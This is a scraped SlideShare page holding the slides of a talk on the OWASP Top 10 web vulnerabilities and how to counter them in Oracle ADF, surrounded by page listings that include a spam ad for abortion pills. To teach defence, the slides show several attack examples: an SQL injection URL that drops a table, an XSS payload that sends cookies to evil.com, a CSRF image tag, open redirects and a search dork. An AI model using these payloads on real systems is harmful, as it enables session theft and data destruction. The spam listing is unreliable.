Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Orbitshub
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
UiPathCommunity
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
 
Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..
Christopher Logan Kennedy
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 

KĂźrzlich hochgeladen (20)

Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityPlatformless Horizons for Digital Adaptability
Platformless Horizons for Digital Adaptability
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
 
WSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering Developers
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
 

OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF

  • 1. Top 10 Web Vulnerabilities, and Securing them with ADF Brian “Bex” Huff Chief Software Architect
  • 2. 2 Agenda  Intro  Open Web Application Security Project (OWASP)  Top 10 Web Application Security Vulnerabilities  Countermeasures  References  For the latest version of this presentation, go to SlideShare:  http://slideshare.com/bexmex
  • 3. Intro  What is OWASP? • http://owasp.org • Worldwide non-profit focused on improving software security • Reaches out to ALL developers: not just security professionals  Who am I? • Oracle ACE Director • Author of 2 books on Oracle Technology • Twitter: @bex  What will you learn? • The top 10 security mistakes that developers make • How to design software with an assurance of security • You don’t need to be a security guru to secure your web apps 3
  • 4. OWASP Top 10 of 2013 1) Injection 2) Broken Authentication and Session Management 3) Cross Site Scripting 4) Insecure Direct Object References 5) Security Misconfiguration 6) Sensitive Data Exposure (NEW) 7) Missing Function Level Access Control (NEW) 8) Cross Site Request Forgery (CSRF) 9) Using Components with Known Vulnerabilities (NEW) 10) Unvalidated Redirects and Forwards 4
  • 5. 1) Injection  Used when your app sends user-supplied data to other apps • Database, Operating System, LDAP, Web Services  Hackers "inject" their code to run instead of yours • To access unauthorized data, or completely take over remote application  Example: SQL injection attack • String query = "SELECT * FROM products WHERE name='" + request.getParameter("id") +"'";  Code expects a nice parameter in the URL • http://example.com/products?id=123  Hackers could pass this into the URL instead • http://example.com/products?id=';+DROP+TABLE+'products'; 5
  • 6. Example  Don’t: name your child Robert’); DROP TABLE Students;--  Do: expect SQL Injection 6
  • 7. Countermeasures  "Connections" between systems are highly vulnerable  Always assume data coming in could be "evil" • Be sure to include "evil" use cases and user stories in your design  Ideally, only allow the user to select among "safe" options • Never allow them to pass data between systems unchecked  If user-input text is needed, use parameterized statements • Clean up quotes, parenthesis, and comments  Use a battle-tested library for protecting your database • ADF prepared statements, OWASP's ESAPI codecs 7
  • 8. Example // good idea ViewObject studentVO = this.getStudentView(); studentVO.setNamedWhereClauseParam("id", id); // bad idea! ViewObject studentVO = this.getStudentView(); studentVO.setWhereClause("id = " + id); // another bad idea! String query = "select * from students where id=" + id; ViewObject vo = appMod.createViewObjectFromQueryStmt(null,query); 8
  • 9. ADF Input Validation  Occurs on most components automatically • Additional validate components available for additional filtering • validateLength, validateLongRange, convertDateTime, etc.  Exception: when immediate=true for some components • Can access raw, unfiltered data through managed bean  Hidden fields do not equal secure fields • Expect hackers to tamper with the HTML, and insert their own values • selectOne and selectMany do automatic validation, and are safe  Use caution with custom AJAX layers • Not always subject to ADF input validation 9
  • 10. 2) Broken Authentication and Session Management  HTTP is a "stateless" protocol • Nice and simple: HTTP request, HTTP response • All data must be passed in the request every time  How do we store state? • Client side with cookies • Server side with sessions  Most apps place a "sessionId" in cookies, or in the URL • Problem: now stealing sessionIds is just as good as stealing passwords!  Multiple ways to determine a session ID • packet sniffing -- especially on an open WiFi access point • HttpReferrer logs, if sessionId is in the URL 10
  • 11. Countermeasures  Assume that a user stole a session ID • Determine how bad this would be in your application  Use SSL everywhere! • Makes it harder for people to “sniff” your session ID  If you cannot use SSL everywhere, use it for logins • Have a cryptographically strong session ID (ADF default) • Have a reasonable timeout, one hour is fine 11
  • 12. ADF Countermeasures  Don’t pass the jsessionid in the URL, put it in a cookie • Evil sites can sniff your session ID from their referrer logs • Cookies harder to sniff if SSL is enabled  Sample web.xml snippet <session-descriptor> <cookie-name>MYAPPSESSID</cookie-name> <url-rewriting-enabled>false</url-rewriting-enabled> <timeout-secs>3600</timeout-secs> </session-descriptor> 12
  • 13. 3) Cross Site Scripting (XSS)  Sites must "cleanse" user input before displaying it • HTML tags can be very dangerous • If a user can embed a <SCRIPT> tag, all is lost!  Hackers can create URLs to inject their own HTML onto the page • Can be used to do almost any kind of attack!!!  ADF is mostly safe, but occasionally vulnerable • User generated content is usually HTML encoded on the page • <script> becomes &lt;script&gt; • Use caution with the af:resource or f:verbatim tags • Never pass in unencoded data! 13
  • 14. Example  Example: JSP to draw HTML based on user input • String html = "<input name='item' type='TEXT' value='" + request.getParameter("item") + "'>";  Code expects a nice URL: • http://example.com/buy?item=123  But a hacker could supply this URL: • http://example.com/buy?item='><script>document.location=' http://evil.com/steal/'+document.cookie</script>  Then trick an administrator or superuser to go there • Cookie is stolen, and now evil user can connect as the admin! 14
  • 15. Countermeasures  Never, ever, ever trust user-submitted content!  Properly "escape" any data before displaying it on web pages • JavaScript parameters, URL parameters, STYLE elements • Remove script tags, and possibly anything with a SRC attribute • Done automatically in ADF, but manually if you bypass ADF and write JS • Use ESAPI to "cleanse" HTML before dumping to page  Do not allow state-change from HTTP GET requests • Otherwise, a rogue IMG tag could delete content • No state change on initial ADF page load!  Set the HttpOnly flag in your response headers • Prevents document.cookie from working in JavaScript 15
  • 16. 4) Insecure Direct Object Reference  Assume my project id is 123  I see a link on “My Projects” page that goes here: • http://example.com/projects/123  If I alter the URL, can I see other people’s projects? • http://example.com/projects/124  Do you only restrict access in the web form?  What if I could "guess" the URL? Could I see the page? • Don't trick yourself into thinking complex URLs are any more secure • Security != Obscurity 16
  • 17. Countermeasures  Every resource needs a security level • What roles do you need to access certain items? • Access Control Lists are easy to implement, but don’t always scale  All access to that resource should go through the same check • What action are you taking, with what resource? • Put it all in one common codebase for simplicity • May need to run check multiple times, for sub-actions and sub-resources • Unusual behavior? Have additional authentication questions/layers!  Front-end restriction is nice for usability, but not security  Ideally, put all security in the Application Module (model) • Single location to secure multiple views 17
  • 18. Countermeasures, ctd.  Avoid direct object reference • Use a temporary variable relevant to just that user • Use a cryptographically strong variable  Validate all references, regardless  Validate access to that reference • Read, write, update, delete 18
  • 19. ADF Global Security Expressions #{securityContext.authenticated} #{securityContext.userName} #{securityContext.userInRole['roleList']} #{securityContext.userInAllRoles['roleList']} #{securityContext.taskflowViewable['target']} #{securityContext.regionViewable['target']} #{securityContext.userGrantedResource['permission']} #{securityContext.userGrantedPermission['permission']} 19
  • 20. 5) Security Misconfiguration  Everything from the OS to the DB to the ADF framework  What if ADF issued a security patch? • Do you have a centralized policy for keeping dependencies up-to-date? • How long would it take you to discover new code? • How long would it take to recompile/test/redeploy?  Do you know all security configurations in the framework? • Odds are no... documentation is usually obtuse • “Being helpful is a security hole”  Have you properly "hardened" your infrastrurcture? • Delete default users, disable unused services and ports • Operating System, WebLogic, Database, MDS 20
  • 21. Countermeasures  Subscribe to newsletters and blog feeds to get patches • Use automation if possible to verify patches  Do periodic scans to detect misconfiguration / missing patches  Disable ports/services/features unused in production  Disable default users and passwords  Never send stack traces or SQL errors directly to end users  Taking over websites shouldn't be this easy: • http://www.google.com/search? q=inurl:SELECT+inurl:FROM+inurl:WHERE+intitle:phpmyadmin 21
  • 22. 6) Sensitive Data Exposure  All applications store sensitive data • Credit cards, passwords, private health/financial documents  Where does this data get stored? • Database, files, logs, backups, etc.  Where does this data get sent? • Over the web, backup databases, partners, internal emails • JMS queue, web service calls  How are you preventing unauthorized access to all these resources? 22
  • 23. Storage Layer Countermeasures  If you store secrets, encrypt them! • Use only battle-tested standard encryption algorithms  Analyze possible threats: inside attack, external user • Make sure encryption policy is appropriate for the threats  Encrypt data anywhere it's stored long term • Especially backups! • Store backups of decryption keys separately from data  Restrict access to decrypted data to only authorized users  Hash all passwords with a standard algorithm, and a "salt"  Use strong keys to access the information  Create a password management policy, and stick with it! 23
  • 24. Sane Pass Phrase Management Policy 24
  • 25. Transport Layer Countermeasures  Use strong, standards compliant network security protocols • Use TLS (SSL) on all connections with sensitive data  Encrypt messages before transmission • XML-Encryption  Sign messages before transmission • XML-Signature  Disable old, flawed encryption algorithms (ie, SSL 2.0) 25
  • 26. 7) Missing Function Level Access Control  Similar to Insecure Direct Object Reference • Need to block specific actions, even if no resource is identified  Example: my project is 123  I will see these URLs on my home page: • http://example.com/project/123 • http://example.com/user/getProjects/  I could fish around and try other URLs as well: • http://example.com/manager/getProjects/ • http://example.com/admin/getProjects/  Would your application prevent this?  Same general issue: • you have front-end security, but not back-end security 26
  • 27. Countermeasures  Do authentication checks at least twice • Front end UI, and back end Controller  Don't draw URLs to the page if the user cannot access them • Bad usability • Hackers might be tempted to fish around for vulnerabilities  Never assume a URL is allowed • Do back-end checks for access, and state change  Add even more layers as needed: • Does all security information exist in the URL? • Can you authenticate right away? • Might you need to get half way through the request before you know what rights are needed? • What if the user has access, but their behavior is unusual • should you prompt for password again, or perhaps for additional authorization? 27
  • 28. 8) Cross-Site Request Forgery  Evil sites can hijack your browser, and run secure requests: 1) User logs into secure application behind the firewall http://example.com/myApp 1) User goes to "evil" website, or loads up "evil" HTML email 2) HTML contains this image: <img src="http://example.com/myApp/deleteEverything"></img>  With JavaScript and XSS, evil sites can completely take over your browser • Can browse around your intranet, log into bank accounts • Anything you are currently logged into • Complete control, as long as you stay on the evil site  Unfortunate side-effect of Single-Sign-On 28
  • 29. Countermeasures  Need a unique token to validate that the request is authentic • The jsessionId is sometimes sufficient, but can be stolen with XSS • More secure: unique token for every HTTP request • If somebody steals your jsessionid, they can only do one request!  Steps to validate every request • Put a random number in the session for the next valid token • Put that token on every HTML web form that causes state change • When processing a request, validate the token • Generate another random token for the next request • Place that token in the session, repeat forever! • NOTE: might not be needed in JSF 2.1  http://blog.eisele.net/2011/02/preventing-csrf-with-jsf-20.html 29
  • 30. 9) Using Components with Known Vulnerabilities  In addition to ADF, you may use other frameworks • Open Source Libraries • OEM Libraries • JavaScript frameworks • JARs and JARs and JARs of fun...  Automated hacker tools can find these dependencies • Unless you are always on the latest stable version, you are vulnerable  All possible attack vectors are open • XSS, injection, CDRF being the most common and most troublesome • Rages from annoying to complete takeover of your servers 30
  • 31. Countermeasures  At a minimum, manually keep track of dependencies/versions • Developers must justify every JAR they depend on • Must manually keep track of version, and check before each release  Better still, use Maven to perform automated builds • Automatically check your JAR version vs. latest stable release  Both have risks to the build process • What if you have to refactor your code every time the JAR is revised? • Annoying, but a neccessary step to secure your applications 31
  • 32. 10) Unvalidated Redirects and Forwards  Most sites allow redirects to other sites, or pages within the site: • http://example.com/redirect?url=google.com  But, open redirect pages can be used by "phishers" to create links to their site: • http://example.com/redirect?url=evil.com  Link looks like it goes to "example.com", but it goes to "evil.com"  Or, can trick a site user into harming their own site: • http://example.com/redirect?url=/admin.jsp?deleteEverything=true  Sometimes called "phishing holes" 32
  • 33. ADF Attack Vectors  Common places to do redirects • PagePhaseListener • Download Servlet • Task Flow router  Example code for a redirect: FacesContext fctx = FacesContext.getCurrentInstance(); fctx.getExternalContext().redirect("http://google.com"); 33
  • 34. Countermeasures  Restrict redirects to a limited number of "trusted" sites  Keep a list of all redirect URLs, and pass the ID in the request, instead of the URL • http://example.com/redirect?urlId=123  Hash the URL with a secret, and pass the hash in the URL • http://example.com/redirect?url=google.com&hash=a1b2c3  Example: does this URL look like a Google Invoice to you? • http://www.google.com/#invoiceId=123&q=oHg5SJYRHA0&btnI=3564  Question: are URL shorteners inherently unsafe? • TinyUrl offers a "preview" feature: others should as well 34
  • 35. References  OWASP top 10, and associated resources • https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project  ADF Code guidelines to prevent security holes: • http://www.oracle.com/technetwork/developer-tools/adf/learnmore/adf- code-guidelines-v1-00-1845659.pdf  JavaScript best practices for ADF • http://www.oracle.com/technetwork/developer-tools/jdev/1-2011-javascript- 302460.pdf  Hardening Fusion Middleware to avoid OWASP issues: • http://antonfroehlich.blogspot.com/2012/06/handling-owasp-top-ten- application.html  JSF and OWASP • http://turbomanage.files.wordpress.com/2009/10/securing-jsf-applications- against-owasp-top-ten-color.pdf 35
  • 36. 36  My Company: http://bezzotech.com  My Blog: http://bexhuff.com  My Slides: http://slideshare.com/bexmex  My Tweets: @bex  My Self: bex@bezzotech.com Questions?